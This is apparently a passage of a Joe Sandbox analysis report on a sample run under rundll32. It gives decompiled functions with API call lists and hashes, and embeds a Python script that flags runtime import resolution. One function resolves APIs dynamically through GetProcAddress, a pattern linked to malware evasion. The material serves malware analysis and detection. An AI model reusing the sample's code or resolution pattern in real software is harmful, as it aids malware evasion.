                          					_t29 = GetProcAddress(_t50,  *0x10841d0 + 0x1085151); // first of five exports resolved by name
                          					 *(_t56 + 0xc) = _t29; // resolved pointers are stored at context+0xc .. +0x1c
                          					if(_t29 == 0) {
                          						L8:
                          						E01081B13(_t56); // failure path: the context goes to E01081B13 and is never returned to the caller
                          					} else {
                          						_t33 = GetProcAddress(_t50,  *0x10841d0 + 0x1085161);
                          						 *(_t56 + 0x10) = _t33;
                          						if(_t33 == 0) {
                          							goto L8;
                          						} else {
                          							_t36 = GetProcAddress(_t50,  *0x10841d0 + 0x1085174);
                          							 *(_t56 + 0x14) = _t36;
                          							if(_t36 == 0) {
                          								goto L8;
                          							} else {
                          								_t39 = GetProcAddress(_t50,  *0x10841d0 + 0x1085189);
                          								 *(_t56 + 0x18) = _t39;
                          								if(_t39 == 0) {
                          									goto L8;
                          								} else {
                          									_t42 = GetProcAddress(_t50,  *0x10841d0 + 0x108519f);
                          									 *(_t56 + 0x1c) = _t42;
                          									if(_t42 == 0) {
                          										goto L8;
                          									} else {
                          										 *((intOrPtr*)(_t56 + 8)) = _a8;
                          										 *((intOrPtr*)(_t56 + 4)) = _a4;
                          										_t46 = E01081F9A(_t56, _a12);
                          										_v8 = _t46;
                          										if(_t46 != 0) {
                          											goto L8;
                          										} else {
                          											 *_a16 = _t56; // success: populated context returned through the out-parameter
                          										}
                          									}
                          								}
                          							}
                          						}
                          					}
                          				}
                          				return _v8; // 0 on success, otherwise a Win32 error code
                          			}

                          Address column (one code address per decompiled line above, detached from the code by extraction): 0x01081128 .. 0x010811fb

                          APIs
                            • Part of subcall function 01081B28: HeapAlloc.KERNEL32(00000000,?,010814E1,00000030,751463F0,00000000), ref: 01081B34
                          • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,01081634,?,?,?,?,?,00000002,?,?), ref: 0108113E
                          • GetProcAddress.KERNEL32(00000000,?), ref: 01081160
                          • GetProcAddress.KERNEL32(00000000,?), ref: 01081176
                          • GetProcAddress.KERNEL32(00000000,?), ref: 0108118C
                          • GetProcAddress.KERNEL32(00000000,?), ref: 010811A2
                          • GetProcAddress.KERNEL32(00000000,?), ref: 010811B8
                            • Part of subcall function 01081F9A: memset.NTDLL ref: 01082019
                          Memory Dump Source
                          • Source File: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                          • Associated: 00000003.00000002.315796531.0000000001085000.00000040.00000800.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1080000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$AllocHandleHeapModulememset
                          • String ID:
                          • API String ID: 426539879-0
                          • Opcode ID: c1dca074330eff4aa29f9a535c60479bcda833f79977fb129add2bc5727d3a48
                          • Instruction ID: c5d84ba8a3fea5fed5894e006cf1b5bcbc87848307f02e602127604359200b32
                          • Opcode Fuzzy Hash: c1dca074330eff4aa29f9a535c60479bcda833f79977fb129add2bc5727d3a48
                          • Instruction Fuzzy Hash: 6D2123F56082069FDF60EFA9DC44E9A7BE8FF446447014465F9C5C7205EB35E906CB60
                          Uniqueness

                          Uniqueness Score: -1.00%
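The APIs block of E0108111A above (one GetModuleHandleA, then five GetProcAddress calls, each checked for NULL before the next, with the results stored at fixed offsets in a heap-allocated context) is the shape behind the report's "Contains functionality to dynamically determine API calls" signature. As an added example, not part of the Joe Sandbox report or of the sample, the following Python script parses the report's per-function "APIs" lines into structured call-site records and applies that heuristic; the sample input is the block printed above, copied into the script, and the names ApiCall, parse_apis, call_sites, is_runtime_import_resolver and the threshold of three GetProcAddress calls are the example's own choices, not a Joe Sandbox rule.

```python
"""Parse the per-function "APIs" call-site lines of a Joe Sandbox report into
structured records and flag functions that build their own import table at
runtime. Added example; SAMPLE_APIS is copied from the report text above."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed input: the APIs block printed for E0108111A in the report.
SAMPLE_APIS = """\
APIs
  \u2022 Part of subcall function 01081B28: HeapAlloc.KERNEL32(00000000,?,010814E1,00000030,751463F0,00000000), ref: 01081B34
\u2022 GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,01081634,?,?,?,?,?,00000002,?,?), ref: 0108113E
\u2022 GetProcAddress.KERNEL32(00000000,?), ref: 01081160
\u2022 GetProcAddress.KERNEL32(00000000,?), ref: 01081176
\u2022 GetProcAddress.KERNEL32(00000000,?), ref: 0108118C
\u2022 GetProcAddress.KERNEL32(00000000,?), ref: 010811A2
\u2022 GetProcAddress.KERNEL32(00000000,?), ref: 010811B8
  \u2022 Part of subcall function 01081F9A: memset.NTDLL ref: 01082019
"""

# One bullet line: optional "Part of subcall function XXXXXXXX:" prefix,
# "Api.MODULE", an optional "(args)" list, then "ref: XXXXXXXX".
_LINE = re.compile(
    r"^\s*\u2022\s*"
    r"(?:Part of subcall function (?P<parent>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]   # as printed: hex constants, or "?" when unknown
    ref: int                # call-site address
    parent: Optional[int]   # address of the subcall function, if attributed to one


def parse_apis(text: str) -> List[ApiCall]:
    calls: List[ApiCall] = []
    for raw in text.splitlines():
        if "\u2022" not in raw:
            continue                                  # "APIs" header or unrelated line
        m = _LINE.match(raw)
        if m is None:
            raise ValueError(f"unrecognised call-site line: {raw!r}")
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        calls.append(ApiCall(
            api=m["api"],
            module=m["module"],
            args=args,
            ref=int(m["ref"], 16),
            parent=int(m["parent"], 16) if m["parent"] else None,
        ))
    return calls


_MODULE_LOOKUPS = {"GetModuleHandleA", "GetModuleHandleW",
                   "LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}


def call_sites(calls: List[ApiCall], api: str) -> List[int]:
    """Addresses at which the function itself (not a subcall) calls `api`."""
    return sorted(c.ref for c in calls if c.api == api and c.parent is None)


def is_runtime_import_resolver(calls: List[ApiCall], min_getprocaddress: int = 3) -> bool:
    """Heuristic: the function obtains a module handle and then resolves several
    exports by name. The threshold is this example's assumption."""
    direct = [c for c in calls if c.parent is None]
    looks_up_module = any(c.api in _MODULE_LOOKUPS for c in direct)
    n_resolved = sum(1 for c in direct if c.api == "GetProcAddress")
    return looks_up_module and n_resolved >= min_getprocaddress


def rva(addr: int, image_base: int) -> int:
    """Relative virtual address, e.g. against the dump's 'Offset: 01080000'."""
    return addr - image_base


if __name__ == "__main__":
    found = parse_apis(SAMPLE_APIS)
    print(Counter(c.api for c in found))
    print("runtime import resolver:", is_runtime_import_resolver(found))
    for site in call_sites(found, "GetProcAddress"):
        print(f"GetProcAddress at {site:08X} (RVA {rva(site, 0x01080000):X})")
```

Calls attributed to subcall functions are kept but excluded from the heuristic, since the HeapAlloc and memset lines describe E01081B28 and E01081F9A rather than E0108111A itself; the RVAs are what you would feed to a disassembler loaded with the 0x01080000 dump.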

                          C-Code - Quality: 67%
                          			E00E32024(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, struct HPALETTE__* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
                          				char _v5;
                          				struct HPALETTE__* _v12;
                          				struct HDC__* _v16;
                          				struct tagBITMAPINFO* _t36;
                          				intOrPtr _t43;
                          				struct HBITMAP__* _t47;
                          				void* _t50;
                          
                          				_t36 = __ecx;
                          				_t47 = __eax;
                          				E00E31ED4(__eax, _a4, __ecx);
                          				_v12 = 0;
                          				_v16 = CreateCompatibleDC(0);
                          				_push(_t50);
                          				_push(0xe320c1);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t50 + 0xfffffff4;
                          				if(__edx != 0) {
                          					_v12 = SelectPalette(_v16, __edx, 0);
                          					RealizePalette(_v16);
                          				}
                          				_v5 = GetDIBits(_v16, _t47, 0, _t36->bmiHeader.biHeight, _a8, _t36, 0) != 0;
                          				_pop(_t43);
                          				 *[fs:eax] = _t43;
                          				_push(0xe320c8);
                          				if(_v12 != 0) {
                          					SelectPalette(_v16, _v12, 0);
                          				}
                          				return DeleteDC(_v16);
                          			}

                          Address column (one code address per decompiled line above, detached from the code by extraction): 0x00e3202d .. 0x00e320c0

                          APIs
                            • Part of subcall function 00E31ED4: GetObjectA.GDI32(?,00000054), ref: 00E31EE8
                          • CreateCompatibleDC.GDI32(00000000), ref: 00E32046
                          • SelectPalette.GDI32(?,?,00000000), ref: 00E32067
                          • RealizePalette.GDI32(?), ref: 00E32073
                          • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00E3208A
                          • SelectPalette.GDI32(?,00000000,00000000), ref: 00E320B2
                          • DeleteDC.GDI32(?), ref: 00E320BB
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
                          • String ID:
                          • API String ID: 1221726059-0
                          • Opcode ID: a9098d7f7e98d3ad4f4c7eff5ac3ec9e450aeef4ae76628c7e2a04e29777ed65
                          • Instruction ID: 1ed3a22a34e7dd58b1a87e8456f0ab91299d54caeadd177878a389b4aad29f7e
                          • Opcode Fuzzy Hash: a9098d7f7e98d3ad4f4c7eff5ac3ec9e450aeef4ae76628c7e2a04e29777ed65
                          • Instruction Fuzzy Hash: C8114C75A042047FDB20DBA9CC95F9EBBECAB48710F5194A8BA14F7281D6749944CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 71%
                          			E00E11AD0() {
                          				void* _t2;
                          				void* _t3;
                          				void* _t14;
                          				intOrPtr* _t19;
                          				intOrPtr _t23;
                          				intOrPtr _t26;
                          				intOrPtr _t28;
                          
                          				_t26 = _t28;
                          				if( *0xe7f5c4 == 0) {
                          					return _t2;
                          				} else {
                          					_push(_t26);
                          					_push(0xe11ba6);
                          					_push( *[fs:edx]);
                          					 *[fs:edx] = _t28;
                          					if( *0xe7f04d != 0) {
                          						_push(0xe7f5cc);
                          						L00E11368(); // RtlEnterCriticalSection on the lock at 0xe7f5cc (APIs list, ref 00E11AFD)
                          					}
                          					 *0xe7f5c4 = 0;
                          					_t3 =  *0xe7f624; // 0x901688
                          					LocalFree(_t3);
                          					 *0xe7f624 = 0;
                          					_t19 =  *0xe7f5ec; // 0x902cbc
                          					while(_t19 != 0xe7f5ec) {
                          						VirtualFree( *(_t19 + 8), 0, 0x8000); // MEM_RELEASE: free each block in the linked list headed at 0xe7f5ec
                          						_t19 =  *_t19;
                          					}
                          					E00E113D0(0xe7f5ec);
                          					E00E113D0(0xe7f5fc);
                          					E00E113D0(0xe7f628);
                          					_t14 =  *0xe7f5e4; // 0x902688
                          					while(_t14 != 0) {
                          						 *0xe7f5e4 =  *_t14;
                          						LocalFree(_t14);
                          						_t14 =  *0xe7f5e4; // 0x902688
                          					}
                          					_pop(_t23);
                          					 *[fs:eax] = _t23;
                          					_push(0xe11bad);
                          					if( *0xe7f04d != 0) {
                          						_push(0xe7f5cc);
                          						L00E11370(); // RtlLeaveCriticalSection (APIs list, ref 00E11B96)
                          					}
                          					_push(0xe7f5cc);
                          					L00E11378(); // RtlDeleteCriticalSection (APIs list, ref 00E11BA0)
                          					return 0;
                          				}
                          			}

                          Address column (one code address per decompiled line above, detached from the code by extraction): 0x00e11ad1 .. 0x00e11ba5

                          APIs
                          • RtlEnterCriticalSection.KERNEL32(00E7F5CC,00000000,00E11BA6), ref: 00E11AFD
                          • LocalFree.KERNEL32(00901688,00000000,00E11BA6), ref: 00E11B0F
                          • VirtualFree.KERNEL32(?,00000000,00008000,00901688,00000000,00E11BA6), ref: 00E11B2E
                          • LocalFree.KERNEL32(00902688,?,00000000,00008000,00901688,00000000,00E11BA6), ref: 00E11B6D
                          • RtlLeaveCriticalSection.KERNEL32(00E7F5CC,00E11BAD,00901688,00000000,00E11BA6), ref: 00E11B96
                          • RtlDeleteCriticalSection.KERNEL32(00E7F5CC,00E11BAD,00901688,00000000,00E11BA6), ref: 00E11BA0
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                          • String ID:
                          • API String ID: 3782394904-0
                          • Opcode ID: 0fae18d71b699b5f2f79841d7cbaeb52675a56fea66bb61fa8e2c3a28b80c3b5
                          • Instruction ID: 57b6993a39a04dc7884faf0aeb7d12087af2a62067ce7287621ecf65ff095038
                          • Opcode Fuzzy Hash: 0fae18d71b699b5f2f79841d7cbaeb52675a56fea66bb61fa8e2c3a28b80c3b5
                          • Instruction Fuzzy Hash: 3011E2706083419EE711EF76EC5AF9937D8A745B44F40A0F1F208BA6E6D6649CC4CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00E31864(void* __eax, signed int __ecx) {
                          				char _v1036;
                          				signed int _v1038;
                          				struct tagRGBQUAD _v1048;
                          				short _v1066;
                          				void* _t20;
                          				struct HDC__* _t25;
                          				void* _t28;
                          				void* _t31;
                          				struct HPALETTE__* _t33;
                          				LOGPALETTE* _t34;
                          
                          				_t31 = __eax;
                          				_t33 = 0;
                          				_t34->palVersion = 0x300; // LOGPALETTE.palVersion must be 0x300
                          				if(__eax == 0) {
                          					_v1038 = __ecx;
                          					E00E128C8(_t28, __ecx << 2,  &_v1036);
                          				} else {
                          					_t25 = CreateCompatibleDC(0);
                          					_t20 = SelectObject(_t25, _t31);
                          					_v1066 = GetDIBColorTable(_t25, 0, 0x100,  &_v1048); // read up to 256 colour-table entries of the selected bitmap
                          					SelectObject(_t25, _t20);
                          					DeleteDC(_t25);
                          				}
                          				if(_v1038 != 0) {
                          					if(_v1038 != 0x10 || E00E317CC(_t34) == 0) {
                          						E00E3165C( &_v1036, _v1038 & 0x0000ffff);
                          					}
                          					_t33 = CreatePalette(_t34);
                          				}
                          				return _t33;
                          			}

                          Address column (one code address per decompiled line above, detached from the code by extraction): 0x00e3186d .. 0x00e31904

                          APIs
                          • CreateCompatibleDC.GDI32(00000000), ref: 00E3187D
                          • SelectObject.GDI32(00000000,00000000), ref: 00E31886
                          • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,00E353E7,?,?,?,?,00E33EE7), ref: 00E3189A
                          • SelectObject.GDI32(00000000,00000000), ref: 00E318A6
                          • DeleteDC.GDI32(00000000), ref: 00E318AC
                          • CreatePalette.GDI32 ref: 00E318F2
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
                          • String ID:
                          • API String ID: 2515223848-0
                          • Opcode ID: 55b457ebcc57d7affc7d6661a16bb02ac7dc8a86ec7a5e11ee98aeba76cb2da9
                          • Instruction ID: b0d1970e1c6bc7cc2d738a0b0d8beaff6ee0055429ca6c6b204c564e64888f13
                          • Opcode Fuzzy Hash: 55b457ebcc57d7affc7d6661a16bb02ac7dc8a86ec7a5e11ee98aeba76cb2da9
                          • Instruction Fuzzy Hash: F501B17160431026E214B7699C4BBABB6FD9FC0754F05FD5DB588BB282E674C884C3A6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00E30F48(void* __eax) {
                          				void* _t36;
                          
                          				_t36 = __eax;
                          				UnrealizeObject(E00E30724( *((intOrPtr*)(__eax + 0x14))));
                          				SelectObject( *(_t36 + 4), E00E30724( *((intOrPtr*)(_t36 + 0x14))));
                          				if(E00E30804( *((intOrPtr*)(_t36 + 0x14))) != 0) {
                          					SetBkColor( *(_t36 + 4),  !(E00E2FA64(E00E306E8( *((intOrPtr*)(_t36 + 0x14))))));
                          					return SetBkMode( *(_t36 + 4), 1);
                          				} else {
                          					SetBkColor( *(_t36 + 4), E00E2FA64(E00E306E8( *((intOrPtr*)(_t36 + 0x14)))));
                          					return SetBkMode( *(_t36 + 4), 2);
                          				}
                          			}

                          APIs
                            • Part of subcall function 00E30724: CreateBrushIndirect.GDI32(?), ref: 00E307CE
                          • UnrealizeObject.GDI32(00000000), ref: 00E30F54
                          • SelectObject.GDI32(?,00000000), ref: 00E30F66
                          • SetBkColor.GDI32(?,00000000), ref: 00E30F89
                          • SetBkMode.GDI32(?,00000002), ref: 00E30F94
                          • SetBkColor.GDI32(?,00000000), ref: 00E30FAF
                          • SetBkMode.GDI32(?,00000001), ref: 00E30FBA
                            • Part of subcall function 00E2FA64: GetSysColor.USER32(?), ref: 00E2FA6E
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                          • String ID:
                          • API String ID: 3527656728-0
                          • Opcode ID: 0e9ff6545ba0f03158794543908d901db828b735dc98eea382adf2760dd3dbd0
                          • Instruction ID: e538e1c088e8ed3a31dd011e6cb13fb35f98fb3d47759509a2f266f9c839fd34
                          • Opcode Fuzzy Hash: 0e9ff6545ba0f03158794543908d901db828b735dc98eea382adf2760dd3dbd0
                          • Instruction Fuzzy Hash: E6F09CB56012009BDF44FFB8DADBD4A6BECAF48305B046491B908FF55BCA65E850CB31
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 89%
                          			E00E42C4C(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                          				char _v8;
                          				char _v12;
                          				char _v16;
                          				char _v20;
                          				void* _t41;
                          				void* _t54;
                          				void* _t61;
                          				struct HMENU__* _t64;
                          				struct HMENU__* _t70;
                          				intOrPtr _t77;
                          				void* _t79;
                          				intOrPtr _t81;
                          				intOrPtr _t83;
                          				intOrPtr _t87;
                          				void* _t92;
                          				intOrPtr _t98;
                          				void* _t111;
                          				intOrPtr _t113;
                          				void* _t116;
                          
                          				_t109 = __edi;
                          				_push(__edi);
                          				_v20 = 0;
                          				_t113 = __edx;
                          				_t92 = __eax;
                          				_push(_t116);
                          				_push(0xe42e12);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t116 + 0xfffffff0;
                          				if(__edx == 0) {
                          					L7:
                          					_t39 =  *((intOrPtr*)(_t92 + 0x248));
                          					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
                          						E00E50700(_t39, 0, _t109, 0);
                          					}
                          					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t113 != 0 && ( *(_t113 + 0x1c) & 0x00000008) != 0) {
                          						_t113 = 0;
                          					}
                          					 *((intOrPtr*)(_t92 + 0x248)) = _t113;
                          					if(_t113 != 0) {
                          						E00E2CD28(_t113, _t92);
                          					}
                          					if(_t113 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
                          						_t41 = E00E5D240(_t92);
                          						__eflags = _t41;
                          						if(_t41 != 0) {
                          							SetMenu(E00E5CFE0(_t92), 0);
                          						}
                          						goto L30;
                          					} else {
                          						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
                          							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
                          								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
                          								if( *((char*)(_t92 + 0x22f)) != 1) {
                          									_t54 = E00E5D240(_t92);
                          									__eflags = _t54;
                          									if(_t54 != 0) {
                          										SetMenu(E00E5CFE0(_t92), 0);
                          									}
                          								}
                          								goto L30;
                          							}
                          							goto L21;
                          						} else {
                          							L21:
                          							if(E00E5D240(_t92) != 0) {
                          								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
                          								_t110 = _t61;
                          								_t64 = GetMenu(E00E5CFE0(_t92));
                          								_t138 = _t61 - _t64;
                          								if(_t61 != _t64) {
                          									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
                          									SetMenu(E00E5CFE0(_t92), _t70);
                          								}
                          								E00E50700(_t113, E00E5CFE0(_t92), _t110, _t138);
                          							}
                          							L30:
                          							if( *((char*)(_t92 + 0x22e)) != 0) {
                          								E00E43D10(_t92, 1);
                          							}
                          							E00E42B84(_t92);
                          							_pop(_t98);
                          							 *[fs:eax] = _t98;
                          							_push(0xe42e19);
                          							return E00E14068( &_v20);
                          						}
                          					}
                          				}
                          				_t77 =  *0xe7fb20; // 0xf01458
                          				_t79 = E00E4647C(_t77) - 1;
                          				if(_t79 >= 0) {
                          					_v8 = _t79 + 1;
                          					_t111 = 0;
                          					do {
                          						_t81 =  *0xe7fb20; // 0xf01458
                          						if(_t113 ==  *((intOrPtr*)(E00E46468(_t81, _t111) + 0x248))) {
                          							_t83 =  *0xe7fb20; // 0xf01458
                          							if(_t92 != E00E46468(_t83, _t111)) {
                          								_v16 =  *((intOrPtr*)(_t113 + 8));
                          								_v12 = 0xb;
                          								_t87 =  *0xe7dee8; // 0xe2e22c
                          								E00E15E1C(_t87,  &_v20);
                          								E00E1B940(_t92, _v20, 1, _t111, _t113, 0,  &_v16);
                          								E00E13A00();
                          							}
                          						}
                          						_t111 = _t111 + 1;
                          						_t10 =  &_v8;
                          						 *_t10 = _v8 - 1;
                          					} while ( *_t10 != 0);
                          				}
                          			}

                          APIs
                          • GetMenu.USER32(00000000), ref: 00E42D70
                          • SetMenu.USER32(00000000,00000000), ref: 00E42D8D
                          • SetMenu.USER32(00000000,00000000), ref: 00E42DC2
                          • SetMenu.USER32(00000000,00000000,00000000,00E42E12), ref: 00E42DDE
                            • Part of subcall function 00E15E1C: LoadStringA.USER32 ref: 00E15E4D
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: Menu$LoadString
                          • String ID: ,
                          • API String ID: 3688185913-2078262936
                          • Opcode ID: 10e72fb9eee357ca3151bfe3cebc6a433544b1c72dc9053f06ae05c6a6d960de
                          • Instruction ID: 445a11e1b91061b31889d41253a289d4d559cc65df3b86c1099f8dc089da85ed
                          • Opcode Fuzzy Hash: 10e72fb9eee357ca3151bfe3cebc6a433544b1c72dc9053f06ae05c6a6d960de
                          • Instruction Fuzzy Hash: ED519E30A043404BCB61EF29EC85BA9B7E5AF44308F856578FD04FB266CA74DC89C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 95%
                          			E00E35FA0(intOrPtr* __eax, void* __edx) {
                          				intOrPtr* _v8;
                          				struct HPALETTE__* _v12;
                          				char _v13;
                          				intOrPtr _v25;
                          				intOrPtr _v29;
                          				intOrPtr _v33;
                          				intOrPtr _v57;
                          				short _v59;
                          				short _v61;
                          				intOrPtr _v65;
                          				intOrPtr _v69;
                          				intOrPtr _v73;
                          				intOrPtr _v77;
                          				intOrPtr _v89;
                          				intOrPtr _v93;
                          				void _v97;
                          				void* _t44;
                          				void* _t46;
                          				intOrPtr _t49;
                          				void* _t54;
                          				struct HPALETTE__* _t56;
                          				void* _t72;
                          				void* _t74;
                          				void* _t75;
                          				struct HDC__* _t76;
                          				intOrPtr _t97;
                          				void* _t107;
                          				void* _t109;
                          				void* _t110;
                          				intOrPtr _t112;
                          
                          				_t107 = _t109;
                          				_t110 = _t109 + 0xffffffa0;
                          				_t72 = __edx;
                          				_v8 = __eax;
                          				_t44 = E00E350DC(_v8);
                          				if(_t72 == _t44) {
                          					L16:
                          					return _t44;
                          				} else {
                          					_t46 = _t72 - 1;
                          					if(_t46 < 0) {
                          						_t44 =  *((intOrPtr*)( *_v8 + 0x6c))();
                          						goto L16;
                          					} else {
                          						if(_t46 == 7) {
                          							_t49 =  *0xe7df28; // 0xe2dfdc
                          							_t44 = E00E3103C(_t49);
                          							goto L16;
                          						} else {
                          							E00E12C80( &_v97, 0x54);
                          							_t54 = memcpy( &_v97,  *((intOrPtr*)(_v8 + 0x28)) + 0x18, 6 << 2);
                          							_t112 = _t110 + 0xc;
                          							_v13 = 0;
                          							_v77 = 0;
                          							_v73 = 0x28;
                          							_v69 = _v93;
                          							_v65 = _v89;
                          							_v61 = 1;
                          							_v59 =  *0x00E7C6F3 & 0x000000ff;
                          							_v12 =  *((intOrPtr*)(_t54 + 0x10));
                          							_t74 = _t72 - 2;
                          							if(_t74 == 0) {
                          								_t56 =  *0xe7f894; // 0x6008075c
                          								_v12 = _t56;
                          							} else {
                          								_t75 = _t74 - 1;
                          								if(_t75 == 0) {
                          									_t76 = E00E31174(GetDC(0));
                          									_v12 = CreateHalftonePalette(_t76);
                          									_v13 = 1;
                          									ReleaseDC(0, _t76);
                          								} else {
                          									if(_t75 == 2) {
                          										_v57 = 3;
                          										_v33 = 0xf800;
                          										_v29 = 0x7e0;
                          										_v25 = 0x1f;
                          									}
                          								}
                          							}
                          							 *[fs:eax] = _t112;
                          							 *((char*)(_v8 + 0x22)) = E00E34BBC( *((intOrPtr*)( *_v8 + 0x64))( *[fs:eax], 0xe360ed, _t107),  &_v97) & 0xffffff00 | _v12 != 0x00000000;
                          							_pop(_t97);
                          							 *[fs:eax] = _t97;
                          							_push(0xe360f4);
                          							if(_v13 != 0) {
                          								return DeleteObject(_v12);
                          							}
                          							return 0;
                          						}
                          					}
                          				}
                          			}

                          APIs
                          • GetDC.USER32(00000000), ref: 00E3605D
                          • CreateHalftonePalette.GDI32(00000000,00000000), ref: 00E3606A
                          • ReleaseDC.USER32 ref: 00E36079
                          • DeleteObject.GDI32(00000000), ref: 00E360E7
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: CreateDeleteHalftoneObjectPaletteRelease
                          • String ID: (
                          • API String ID: 577518360-3887548279
                          • Opcode ID: a0fad7c1d1a2b3e272acb29d3ebffaf3440bab3ab555f494192e468abfbb9070
                          • Instruction ID: 86859add2e0c8a8b4036cc17e8ddd2feb2d614f36a4d278d43b46aba3db151d1
                          • Opcode Fuzzy Hash: a0fad7c1d1a2b3e272acb29d3ebffaf3440bab3ab555f494192e468abfbb9070
                          • Instruction Fuzzy Hash: C3417370A04208EFDB18DFA8C44AADEBBF6EF49304F1090A5E504B7351D675AA45DB45
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00E1B6B4(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				char _v273;
                          				char _v534;
                          				char _v790;
                          				struct _MEMORY_BASIC_INFORMATION _v820;
                          				char _v824;
                          				intOrPtr _v828;
                          				char _v832;
                          				intOrPtr _v836;
                          				char _v840;
                          				intOrPtr _v844;
                          				char _v848;
                          				char* _v852;
                          				char _v856;
